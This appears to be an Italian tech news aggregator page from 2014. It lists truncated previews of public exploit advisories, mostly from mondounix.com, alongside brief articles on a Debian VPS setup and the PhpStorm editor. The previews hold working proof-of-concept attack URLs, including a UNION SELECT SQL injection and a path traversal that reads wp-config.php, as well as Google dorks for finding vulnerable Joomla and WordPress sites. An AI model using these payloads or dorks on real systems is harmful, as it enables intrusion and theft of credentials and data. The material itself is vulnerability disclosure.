Joomla RD Download SQL Injection

31 ottobre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/python
#
# Exploit Name: Joomla RD Download SQL Injection
#
# Version: Unknown
#
# Exploit discovered and written by Claudio Viviani
#
# Dork google 1:  inurl:index.php?option=com_rd_download
# Dork google 2:  inurl:/component/rd_download/
#
# Tested on BackBox 3.x
#
# http connection
import urllib, urllib2
# string manipulation
import re
# Errors management
import sys
# Args management
import optparse
 
# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url
 
banner = """
           _______                      __...

Leggi il seguito »

Installare webserver Apache+MySQL+PHP su VPS (Debian)

31 ottobre 2014 - Fonte: http://www.webinblack.net

openlogo 50 Installare webserver Apache+MySQL+PHP su VPS (Debian)I VPS (Virtual Private Server) stanno andando sempre più di moda, dovuto anche ai  prezzi che si son fatti più concorrenziali, e risultano ad oggi un buon sistema di hosting a basso costo (sì, anche WebInBlack è su VPS), assieme ai Cloud Server (che però possono essere più costosi). Il rovescio della medaglia dei VPS è quello che non ammettono neofiti, ovvero la maggior...

Leggi il seguito »

NuevoLabs flash player for clipshare SQL Injection

29 ottobre 2014 - Fonte: http://www.mondounix.com
Nuevolabs Nuevoplayer for clipshare SQL Injection
=======================================================================
 
:: ADVISORY SUMMARY ::
Title:     Nuevolabs Nuevoplayer for clipshare Sql Injection
Vendor:    NUEVOLABS (www.nuevolabs.com)
Product:   NUEVOPLAYER for clipshare
Credits:   Cory Marsh - protectlogic.com
Discovery: 2014-10-10
Release:   2014-10-28
 
Nueovplayer is a popular flash video player with integration into multiple popular video sharing suites.  The most 
notable is Clipshare (clip-share.com).  Nuevoplayer provides flash video playing capabilities to third party video 
sharing suites.
 
 
:: VULNERABILITY ::
Type:     SQL Injection and Privilege Escalation
Category: Remote
Severity:...

Leggi il seguito »

Tuleap 7.4.99.5 Remote Command Execution

29 ottobre 2014 - Fonte: http://www.mondounix.com
Vulnerability title: Tuleap <= 7.4.99.5 Remote Command Execution in Enalean Tuleap
CVE: CVE-2014-7178
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
Tuleap does not validate the syntax of the requests submitted to SVN handler pages in order to validate weather request passed to passthru() function are introducing any extra parameters that would be executed in the content of the application.
 
This vulnerability can be exploited by external attackers to introduce external commands into the workflow of the application that would execute them as shown on the attached Proof Of Concept code below.
 
After registering with the application...

Leggi il seguito »

Tuleap 7.2 XXE Injection

29 ottobre 2014 - Fonte: http://www.mondounix.com
Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap
CVE: CVE-2014-7177
Vendor: Enalean
Product: Tuleap
Affected version: 7.2 and earlier
Fixed version: 7.4.99.5
Reported by: Jerzy Kramarz
 
Details:
 
A multiple XML External Entity Injection has been found and confirmed within the software as an authenticated user. Successful attack could allow an authenticated attacker to access local system files. The following example vectors can be used as PoC to confirm the vulnerability.
 
Vulnerability 1:
 
1) Upload a XXE using the following request:
 
 
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
Host: [ip]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0)...

Leggi il seguito »

Tuleap 7.4.99.5 Blind SQL Injection

29 ottobre 2014 - Fonte: http://www.mondounix.com
Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
CVE: CVE-2014-7176
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injections:
 
 
GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
Host: 192.168.56.108
User-Agent:...

Leggi il seguito »

WordPress Download Manager Arbitrary File Download

28 ottobre 2014 - Fonte: http://www.mondounix.com
# WordPress Download Manager Plugin - Arbitrary File Download
# CWE: CWE-98
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 25/10/2014
# Vendor Homepage: https://wordpress.org/plugins/download-manager/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: inurl:/plugins/download-manager/
 
# VUL: /views/file_download.php?fname=
 
 or:
 
 /file_download.php?fname=
 
# PoC : 
 
 http://WEBSITE/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php
 
 
# Xploit: Find one website with use /plugins/download-manager/ && ADD TO Link:/views/file_download.php?fname=../../wp-config.php

(12)

...

Leggi il seguito »

WordPress HTML5 / Flash Player SQL Injection

28 ottobre 2014 - Fonte: http://www.mondounix.com
# WordPress HTML5 and FLash PLayer Plugin SQL Injection
# CWE: CWE-89
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 24/10/2014
# Vendor Homepage: https://wordpress.org/plugins/player/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: inurl: "Index of" +inurl:/wp-content/plugins/player/
 
# PoC : 
 
http://WEBSITE/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,table_name,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from information_schema.tables where table_schema=database()--
 
 
# Xploit: Are vulnerable sites that have...

Leggi il seguito »

PhpStorm 8 editor PHP

26 ottobre 2014 - Fonte: http://www.tecnofonia.net
Per ogni programmatore, la scelta di un buon IDE dove scrivere codice è una delle scelte cruciali da cui dipenderà molta della propria produttività. Se siete web developer, ed in particolare programmate in linguaggio PHP, uno dei migliori editor  che potete trovare attualmente è sicuramente PhpStorm di Jetbrains. Attraverso PhpStorm avrete a disposizione un ambiente di sviluppo completo e potente per la stesura del vostro codice, con

Articolo completo: PhpStorm 8 editor PHP...

Leggi il seguito »

WordPress CP Multi View Event Calendar 1.01 SQL Injection

24 ottobre 2014 - Fonte: http://www.mondounix.com
######################
 
# Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability
 
# Exploit Author : Claudio Viviani 
 
# Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip
 
# Date : 2014-10-23
 
# Tested on : Windows 7 / Mozilla Firefox
              Windows 7 / sqlmap (0.8-1)
              Linux / Mozilla Firefox
              Linux / sqlmap 1.0-dev-5b2ded0
 
######################
 
 
# Description
 
CP Multi View Event Calendar 1.01 suffers from SQL injection vulnerability
 
calid variable is not sanitized.
 
######################
 
# PoC
 
http://localhost/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1...

Leggi il seguito »